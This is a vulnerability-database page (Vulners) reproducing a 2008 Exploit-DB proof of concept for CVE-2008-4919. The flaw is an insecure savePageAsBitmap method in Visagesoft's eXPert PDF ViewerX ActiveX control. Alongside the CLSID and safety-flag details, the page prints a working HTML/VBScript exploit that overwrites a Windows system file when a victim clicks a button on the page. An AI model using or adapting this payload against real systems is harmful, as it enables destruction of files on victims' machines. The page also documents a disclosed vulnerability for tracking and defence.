Lucene search
+L

Visagesoft eXPert PDF ViewerX - 'VSPDFViewerX.ocx' File Overwrite

🗓️ 29 Oct 2008 00:00:00Reported by Marco TortiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 63 Views

Visagesoft eXPert PDF ViewerX insecure method allows file overwrit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-4919
29 Oct 200800:00
circl
cve
CVE
CVE-2008-4919
4 Nov 200820:00
cve
cvelist
Cvelist
CVE-2008-4919
4 Nov 200820:00
cvelist
euvd
EUVD
EUVD-2008-4898
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-4919
4 Nov 200821:00
nvd
openvas
OpenVAS
Visagesoft eXPert PDF Viewer ActiveX Control File Overwrite Vulnerability
2 Dec 200800:00
openvas
openvas
OpenVAS
Detection of Dangerous ActiveX Control
4 Feb 200900:00
openvas
openvas
OpenVAS
Detection of Dangerous ActiveX Control
4 Feb 200900:00
openvas
prion
Prion
Security feature bypass
4 Nov 200821:00
prion
 VISAGESOFT eXPertPDFViewerX (VSPDFViewerX.ocx) INSECURE METHOD
 SITE: http://www.visagesoft.com

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.
 Author: Marco Torti
 mail: marcotorti2[at]yahoo[dot]com
 thanks UGIS
################################################################################
 FileVersion:   3.0.990.0
 CLSID:  {BDF3E9D2-5F7A-4F4A-A914-7498C862EA6A}
 Description: Visagesoft PDF Viewer Control
 ProgID:        VSPDFViewer.VSPDFViewer

  Marked as:
  RegKey Safe for Script: False
  RegKey Safe for Init: False
  Implements IObjectSafety: True
  IDisp Safe: Safe for untrusted: caller,data
  IPStorage Safe: Safe for untrusted: caller,data

 Vulnerable method:
 savePageAsBitmap(ByVal bitmapFileName  As String) As Boolean
##################################################################################
 Vulnerability Description:
    The "savePageAsBitmap" method doesn't check user supplied arguments so we
    can save/overwrite a specified file passed as argument, i don't have time, check others functions....
 Tested on Windows XP Professional SP3 fully patched, with Internet Explorer 7
###################################################################################
<object classid='clsid:BDF3E9D2-5F7A-4F4A-A914-7498C862EA6A' id='target'/></object>
<input language=VBScript onclick=launch() type=button value='start exploit'>
<script language='vbscript'>
Sub launch
target.savePageAsBitmap "c:\windows\-system.ini"
MsgBox"Exploit Completed.. file overwrite!"
End Sub
</script>
###################################################################################

# milw0rm.com [2008-10-29]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Oct 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 28.8
EPSS0.02775
63